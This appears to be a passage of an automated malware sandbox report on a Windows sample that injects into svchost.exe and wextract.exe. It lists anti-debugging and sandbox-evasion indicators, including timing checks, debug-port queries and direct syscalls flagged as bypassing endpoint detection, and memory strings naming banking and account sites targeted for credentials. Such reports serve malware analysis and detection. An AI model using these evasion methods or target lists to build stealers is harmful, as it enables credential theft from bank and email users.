Source: C:\Windows\SysWOW64\wextract.exe	API/Special instruction interceptor: Address: 7FFB2CECD944
Source: C:\Windows\SysWOW64\wextract.exe	API/Special instruction interceptor: Address: 7FFB2CECD504
Source: C:\Windows\SysWOW64\wextract.exe	API/Special instruction interceptor: Address: 7FFB2CECD544
Source: C:\Windows\SysWOW64\wextract.exe	API/Special instruction interceptor: Address: 7FFB2CECD1E4
Source: C:\Windows\SysWOW64\wextract.exe	API/Special instruction interceptor: Address: 7FFB2CED0154
Source: C:\Windows\SysWOW64\wextract.exe	API/Special instruction interceptor: Address: 7FFB2CECDA44

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 2_2_0327096E rdtsc

2_2_0327096E

Source: C:\Users\user\Desktop\oLCnCWQDhK.exe

Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes

graph_0-87594

Source: C:\Users\user\Desktop\oLCnCWQDhK.exe	API coverage: 3.5 %
Source: C:\Windows\SysWOW64\svchost.exe	API coverage: 0.6 %
Source: C:\Windows\SysWOW64\wextract.exe	API coverage: 2.8 %

Source: C:\Windows\SysWOW64\wextract.exe TID: 4268

Thread sleep time: -56000s >= -30000s

Source: C:\Windows\SysWOW64\wextract.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\wextract.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\oLCnCWQDhK.exe	Code function: 0_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose,	0_2_00452492
Source: C:\Users\user\Desktop\oLCnCWQDhK.exe	Code function: 0_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00442886
Source: C:\Users\user\Desktop\oLCnCWQDhK.exe	Code function: 0_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	0_2_004788BD
Source: C:\Users\user\Desktop\oLCnCWQDhK.exe	Code function: 0_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose,	0_2_004339B6
Source: C:\Users\user\Desktop\oLCnCWQDhK.exe	Code function: 0_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose,	0_2_0045CAFA
Source: C:\Users\user\Desktop\oLCnCWQDhK.exe	Code function: 0_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00431A86
Source: C:\Users\user\Desktop\oLCnCWQDhK.exe	Code function: 0_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,	0_2_0044BD27
Source: C:\Users\user\Desktop\oLCnCWQDhK.exe	Code function: 0_2_0045DE8F FindFirstFileW,FindClose,	0_2_0045DE8F
Source: C:\Users\user\Desktop\oLCnCWQDhK.exe	Code function: 0_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_0044BF8B
Source: C:\Windows\SysWOW64\wextract.exe	Code function: 13_2_02CDC030 FindFirstFileW,FindNextFileW,FindClose,	13_2_02CDC030

Source: C:\Users\user\Desktop\oLCnCWQDhK.exe

Code function: 0_2_0040E500 GetVersionExW,GetCurrentProcess,GetNativeSystemInfo,FreeLibrary,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,FreeLibrary,

0_2_0040E500

Source: EthPSueuMbeZ.exe, 00000010.00000002.2505518207.00000000013EF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllU
Source: 78-E67-I.13.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
Source: 78-E67-I.13.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
Source: wextract.exe, 0000000D.00000002.2507505287.0000000007D28000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,1169649
Source: wextract.exe, 0000000D.00000002.2507505287.0000000007D28000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: rs.comVMware20,11696492231
Source: 78-E67-I.13.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696492231}
Source: 78-E67-I.13.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696492231d
Source: 78-E67-I.13.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696492231
Source: 78-E67-I.13.dr	Binary or memory string: outlook.office.comVMware20,11696492231s
Source: 78-E67-I.13.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
Source: wextract.exe, 0000000D.00000002.2507505287.0000000007D28000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: oft.visualstudio.comVMware20,11696492231x
Source: 78-E67-I.13.dr	Binary or memory string: AMC password management pageVMware20,11696492231
Source: 78-E67-I.13.dr	Binary or memory string: interactivebrokers.comVMware20,11696492231
Source: 78-E67-I.13.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696492231x
Source: wextract.exe, 0000000D.00000002.2507505287.0000000007D28000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: East & CentralVMware20,11696492231
Source: 78-E67-I.13.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
Source: 78-E67-I.13.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
Source: wextract.exe, 0000000D.00000002.2507505287.0000000007D28000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,1169649'
Source: 78-E67-I.13.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696492231
Source: 78-E67-I.13.dr	Binary or memory string: outlook.office365.comVMware20,11696492231t
Source: wextract.exe, 0000000D.00000002.2507505287.0000000007D28000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: n PasswordVMware20,11696492231x
Source: 78-E67-I.13.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
Source: 78-E67-I.13.dr	Binary or memory string: discord.comVMware20,11696492231f
Source: wextract.exe, 0000000D.00000002.2503345244.0000000002DF5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: wextract.exe, 0000000D.00000002.2507505287.0000000007D28000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,1169649U
Source: firefox.exe, 00000011.00000002.2252318408.0000025B1C1DC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll8
Source: wextract.exe, 0000000D.00000002.2507505287.0000000007D28000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696492231y
Source: 78-E67-I.13.dr	Binary or memory string: global block list test formVMware20,11696492231
Source: 78-E67-I.13.dr	Binary or memory string: dev.azure.comVMware20,11696492231j
Source: 78-E67-I.13.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696492231}
Source: 78-E67-I.13.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
Source: wextract.exe, 0000000D.00000002.2507505287.0000000007D28000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,1169649223o
Source: 78-E67-I.13.dr	Binary or memory string: bankofamerica.comVMware20,11696492231x
Source: 78-E67-I.13.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696492231h
Source: 78-E67-I.13.dr	Binary or memory string: tasks.office.comVMware20,11696492231o
Source: 78-E67-I.13.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696492231u
Source: 78-E67-I.13.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231
Source: 78-E67-I.13.dr	Binary or memory string: ms.portal.azure.comVMware20,11696492231
Source: 78-E67-I.13.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
Source: 78-E67-I.13.dr	Binary or memory string: turbotax.intuit.comVMware20,11696492231t
Source: 78-E67-I.13.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696492231\|UE
Source: 78-E67-I.13.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696492231x
Source: 78-E67-I.13.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696492231]

Source: C:\Users\user\Desktop\oLCnCWQDhK.exe

API call chain: ExitProcess graph end node

graph_0-86726

Source: C:\Windows\SysWOW64\svchost.exe

Process information queried: ProcessInformation

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Windows\SysWOW64\svchost.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\wextract.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 2_2_0327096E rdtsc

2_2_0327096E

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 2_2_006A7143 LdrLoadDll,

2_2_006A7143

Source: C:\Users\user\Desktop\oLCnCWQDhK.exe

Code function: 0_2_0045A370 BlockInput,

0_2_0045A370

Source: C:\Users\user\Desktop\oLCnCWQDhK.exe

Code function: 0_2_0040D590 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW,

0_2_0040D590

Source: C:\Users\user\Desktop\oLCnCWQDhK.exe

Code function: 0_2_0040EBD0 LoadLibraryA,GetProcAddress,

0_2_0040EBD0

Source: C:\Users\user\Desktop\oLCnCWQDhK.exe	Code function: 0_2_041824D0 mov eax, dword ptr fs:[00000030h]	0_2_041824D0
Source: C:\Users\user\Desktop\oLCnCWQDhK.exe	Code function: 0_2_04182530 mov eax, dword ptr fs:[00000030h]	0_2_04182530
Source: C:\Users\user\Desktop\oLCnCWQDhK.exe	Code function: 0_2_04180EB0 mov eax, dword ptr fs:[00000030h]	0_2_04180EB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03308324 mov eax, dword ptr fs:[00000030h]	2_2_03308324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03308324 mov ecx, dword ptr fs:[00000030h]	2_2_03308324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03308324 mov eax, dword ptr fs:[00000030h]	2_2_03308324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03308324 mov eax, dword ptr fs:[00000030h]	2_2_03308324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326A30B mov eax, dword ptr fs:[00000030h]	2_2_0326A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326A30B mov eax, dword ptr fs:[00000030h]	2_2_0326A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326A30B mov eax, dword ptr fs:[00000030h]	2_2_0326A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0322C310 mov ecx, dword ptr fs:[00000030h]	2_2_0322C310
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03250310 mov ecx, dword ptr fs:[00000030h]	2_2_03250310
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032D437C mov eax, dword ptr fs:[00000030h]	2_2_032D437C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h]	2_2_032B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h]	2_2_032B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h]	2_2_032B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h]	2_2_032B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h]	2_2_032B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h]	2_2_032B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h]	2_2_032B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h]	2_2_032B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h]	2_2_032B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h]	2_2_032B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h]	2_2_032B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h]	2_2_032B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h]	2_2_032B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h]	2_2_032B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h]	2_2_032B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B035C mov eax, dword ptr fs:[00000030h]	2_2_032B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B035C mov eax, dword ptr fs:[00000030h]	2_2_032B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B035C mov eax, dword ptr fs:[00000030h]	2_2_032B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B035C mov ecx, dword ptr fs:[00000030h]	2_2_032B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B035C mov eax, dword ptr fs:[00000030h]	2_2_032B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B035C mov eax, dword ptr fs:[00000030h]	2_2_032B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032FA352 mov eax, dword ptr fs:[00000030h]	2_2_032FA352
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032D8350 mov ecx, dword ptr fs:[00000030h]	2_2_032D8350
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0330634F mov eax, dword ptr fs:[00000030h]	2_2_0330634F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0322E388 mov eax, dword ptr fs:[00000030h]	2_2_0322E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0322E388 mov eax, dword ptr fs:[00000030h]	2_2_0322E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0322E388 mov eax, dword ptr fs:[00000030h]	2_2_0322E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325438F mov eax, dword ptr fs:[00000030h]	2_2_0325438F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325438F mov eax, dword ptr fs:[00000030h]	2_2_0325438F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03228397 mov eax, dword ptr fs:[00000030h]	2_2_03228397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03228397 mov eax, dword ptr fs:[00000030h]	2_2_03228397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03228397 mov eax, dword ptr fs:[00000030h]	2_2_03228397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032403E9 mov eax, dword ptr fs:[00000030h]	2_2_032403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032403E9 mov eax, dword ptr fs:[00000030h]	2_2_032403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032403E9 mov eax, dword ptr fs:[00000030h]	2_2_032403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032403E9 mov eax, dword ptr fs:[00000030h]	2_2_032403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032403E9 mov eax, dword ptr fs:[00000030h]	2_2_032403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032403E9 mov eax, dword ptr fs:[00000030h]	2_2_032403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032403E9 mov eax, dword ptr fs:[00000030h]	2_2_032403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032403E9 mov eax, dword ptr fs:[00000030h]	2_2_032403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0324E3F0 mov eax, dword ptr fs:[00000030h]	2_2_0324E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0324E3F0 mov eax, dword ptr fs:[00000030h]	2_2_0324E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0324E3F0 mov eax, dword ptr fs:[00000030h]	2_2_0324E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032663FF mov eax, dword ptr fs:[00000030h]	2_2_032663FF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032EC3CD mov eax, dword ptr fs:[00000030h]	2_2_032EC3CD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0323A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0323A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0323A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0323A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0323A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0323A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032383C0 mov eax, dword ptr fs:[00000030h]	2_2_032383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032383C0 mov eax, dword ptr fs:[00000030h]	2_2_032383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032383C0 mov eax, dword ptr fs:[00000030h]	2_2_032383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032383C0 mov eax, dword ptr fs:[00000030h]	2_2_032383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B63C0 mov eax, dword ptr fs:[00000030h]	2_2_032B63C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032DE3DB mov eax, dword ptr fs:[00000030h]	2_2_032DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032DE3DB mov eax, dword ptr fs:[00000030h]	2_2_032DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032DE3DB mov ecx, dword ptr fs:[00000030h]	2_2_032DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032DE3DB mov eax, dword ptr fs:[00000030h]	2_2_032DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032D43D4 mov eax, dword ptr fs:[00000030h]	2_2_032D43D4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032D43D4 mov eax, dword ptr fs:[00000030h]	2_2_032D43D4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0322823B mov eax, dword ptr fs:[00000030h]	2_2_0322823B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03234260 mov eax, dword ptr fs:[00000030h]	2_2_03234260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03234260 mov eax, dword ptr fs:[00000030h]	2_2_03234260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03234260 mov eax, dword ptr fs:[00000030h]	2_2_03234260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0322826B mov eax, dword ptr fs:[00000030h]	2_2_0322826B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032E0274 mov eax, dword ptr fs:[00000030h]	2_2_032E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032E0274 mov eax, dword ptr fs:[00000030h]	2_2_032E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032E0274 mov eax, dword ptr fs:[00000030h]	2_2_032E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032E0274 mov eax, dword ptr fs:[00000030h]	2_2_032E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032E0274 mov eax, dword ptr fs:[00000030h]	2_2_032E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032E0274 mov eax, dword ptr fs:[00000030h]	2_2_032E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032E0274 mov eax, dword ptr fs:[00000030h]	2_2_032E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032E0274 mov eax, dword ptr fs:[00000030h]	2_2_032E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032E0274 mov eax, dword ptr fs:[00000030h]	2_2_032E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032E0274 mov eax, dword ptr fs:[00000030h]	2_2_032E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032E0274 mov eax, dword ptr fs:[00000030h]	2_2_032E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032E0274 mov eax, dword ptr fs:[00000030h]	2_2_032E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B8243 mov eax, dword ptr fs:[00000030h]	2_2_032B8243
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B8243 mov ecx, dword ptr fs:[00000030h]	2_2_032B8243
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0330625D mov eax, dword ptr fs:[00000030h]	2_2_0330625D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0322A250 mov eax, dword ptr fs:[00000030h]	2_2_0322A250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03236259 mov eax, dword ptr fs:[00000030h]	2_2_03236259
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032EA250 mov eax, dword ptr fs:[00000030h]	2_2_032EA250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032EA250 mov eax, dword ptr fs:[00000030h]	2_2_032EA250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032402A0 mov eax, dword ptr fs:[00000030h]	2_2_032402A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032402A0 mov eax, dword ptr fs:[00000030h]	2_2_032402A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032C62A0 mov eax, dword ptr fs:[00000030h]	2_2_032C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032C62A0 mov ecx, dword ptr fs:[00000030h]	2_2_032C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032C62A0 mov eax, dword ptr fs:[00000030h]	2_2_032C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032C62A0 mov eax, dword ptr fs:[00000030h]	2_2_032C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032C62A0 mov eax, dword ptr fs:[00000030h]	2_2_032C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032C62A0 mov eax, dword ptr fs:[00000030h]	2_2_032C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326E284 mov eax, dword ptr fs:[00000030h]	2_2_0326E284
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326E284 mov eax, dword ptr fs:[00000030h]	2_2_0326E284
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B0283 mov eax, dword ptr fs:[00000030h]	2_2_032B0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B0283 mov eax, dword ptr fs:[00000030h]	2_2_032B0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B0283 mov eax, dword ptr fs:[00000030h]	2_2_032B0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032402E1 mov eax, dword ptr fs:[00000030h]	2_2_032402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032402E1 mov eax, dword ptr fs:[00000030h]	2_2_032402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032402E1 mov eax, dword ptr fs:[00000030h]	2_2_032402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0323A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0323A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0323A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0323A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0323A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033062D6 mov eax, dword ptr fs:[00000030h]	2_2_033062D6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03260124 mov eax, dword ptr fs:[00000030h]	2_2_03260124
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032DE10E mov eax, dword ptr fs:[00000030h]	2_2_032DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032DE10E mov ecx, dword ptr fs:[00000030h]	2_2_032DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032DE10E mov eax, dword ptr fs:[00000030h]	2_2_032DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032DE10E mov eax, dword ptr fs:[00000030h]	2_2_032DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032DE10E mov ecx, dword ptr fs:[00000030h]	2_2_032DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032DE10E mov eax, dword ptr fs:[00000030h]	2_2_032DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032DE10E mov eax, dword ptr fs:[00000030h]	2_2_032DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032DE10E mov ecx, dword ptr fs:[00000030h]	2_2_032DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032DE10E mov eax, dword ptr fs:[00000030h]	2_2_032DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032DE10E mov ecx, dword ptr fs:[00000030h]	2_2_032DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032DA118 mov ecx, dword ptr fs:[00000030h]	2_2_032DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032DA118 mov eax, dword ptr fs:[00000030h]	2_2_032DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032DA118 mov eax, dword ptr fs:[00000030h]	2_2_032DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032DA118 mov eax, dword ptr fs:[00000030h]	2_2_032DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032F0115 mov eax, dword ptr fs:[00000030h]	2_2_032F0115
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03304164 mov eax, dword ptr fs:[00000030h]	2_2_03304164
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03304164 mov eax, dword ptr fs:[00000030h]	2_2_03304164
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032C4144 mov eax, dword ptr fs:[00000030h]	2_2_032C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032C4144 mov eax, dword ptr fs:[00000030h]	2_2_032C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032C4144 mov ecx, dword ptr fs:[00000030h]	2_2_032C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032C4144 mov eax, dword ptr fs:[00000030h]	2_2_032C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032C4144 mov eax, dword ptr fs:[00000030h]	2_2_032C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0322C156 mov eax, dword ptr fs:[00000030h]	2_2_0322C156
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032C8158 mov eax, dword ptr fs:[00000030h]	2_2_032C8158
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03236154 mov eax, dword ptr fs:[00000030h]	2_2_03236154
